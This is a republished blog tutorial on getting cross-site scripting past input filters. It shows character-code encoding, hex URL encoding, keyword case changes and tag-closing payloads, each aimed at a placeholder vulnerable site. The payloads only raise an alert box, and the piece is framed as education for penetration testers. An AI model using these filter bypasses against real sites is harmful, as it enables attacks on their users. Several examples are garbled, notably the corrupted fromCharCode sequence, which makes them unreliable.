"Foreign language" advanced XSS Tutorials for WEB application Pen testing

Source: Internet
Author: User
Tags closing tag hex code

Original http://alihassanpenetrationtester.blogspot.com/2013/01/bypassing-xss-filters-advanced-xss.html

Hi friends, last time, I explained what's XSS and how a attacker can inject malicious script in your site. As I promised earlier, I am writing this advanced XSS tutorial for you (still more articles would come)

.

Sometimes, website owner use XSS filters (WAF) to protect against XSS vulnerability.
For eg:if you put the <scirpt>alert ("Hi") </script>, the Filter would escape the "(quote) character, So the script would become

<script>alert (>xss detected<) </script>

Now the script won ' t work.  Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter. Here I am going to cover.

1.Bypassing MAGIC_QUOTES_GPC

The Magic_quotes_gpc=on is a PHP setting (configured in PHP.ini File), it escapes the Every ' (Single-quote), "(Doubl e quote) and \ with a backslash automatically.
For Eg:
<scirpt>alert ("HI");</script> 'll be filtered as <script>alert (\hi\) </script>.so the script Won ' t work now.

This is the well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
For Eg:alert ("HI"); Can is converted to

String.fromCharCode (108, 101, 104
, Max, $, $,--)

So the script would become <script>string.fromcharcode ($, 108, 101, A, A, a, a, a 104, a.  Pt>.  In this case there is no "(quotes) or ' (a quotes) or/so the filter can ' t filter this thing. Yes, it'll successfully run the script.

String.fromCharCode () is a JavaScript function, which converts ASCII value to characters.


How to convert to ASCII values?

There is some online sites that converts to ASCII character. But I suggest the use Hackbar Mozilla addon.

After installing Hackbar add on, press F9. It'll open the small box above the URL bar. Click the Xss->string.fromcharcode ()


Now it'll popup small window.  Enter the code for instance alert ("Hi").  Click OK button. Now we got the output.


Copy the code into the <script></script> inside and inserts in the vulnerable sites

For eg:

Hxxp://vulnerable-site/search?q=<script>string.fromcharcode (97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, ) </script>


2.HEX Encoding

We can encode our whole script to HEX code so the It can ' t be filtered.
For example: <script>alert ("Hi");</script> can is convert to HEX as:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

Now put the code in the vulnerable site request.
For ex:

hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63% 72%69%70%74%3e

Converting to HEX:
This site would convert to hex code:http://centricle.com/tools/ascii-hex/

3.Bypassing using obfuscation

Some website Admin put the script,alert in restricted word list. So whenever your input this keywords, the filter would remove it and would give error message like "is not allowed To search this ". This can bypassed by changing the case of the keywords (namely obfuscation).
For eg:

<script>alert ("Hi");</script>


This bypass technique rarely works and giving trial is worth.

4. Closing Tag

Sometimes putting "> at the beginning of the code would work.

"><script>alert (" Hi ");</script>


This would end the previous opened tag and open our script tag.
Example:

hxxp://vulnerable-site/search?q= "><script>alert (" Hi ");</script>


Conclusion:

From above article, it's clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask Pentesters to test your application or test yourself.

Also There is lot of the different filter bypassing technique, I just covered some useful techniques for you.

Disclaimer:

This article are intended for educational purpose only.

"Foreign language" advanced XSS Tutorials for WEB application Pen testing

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.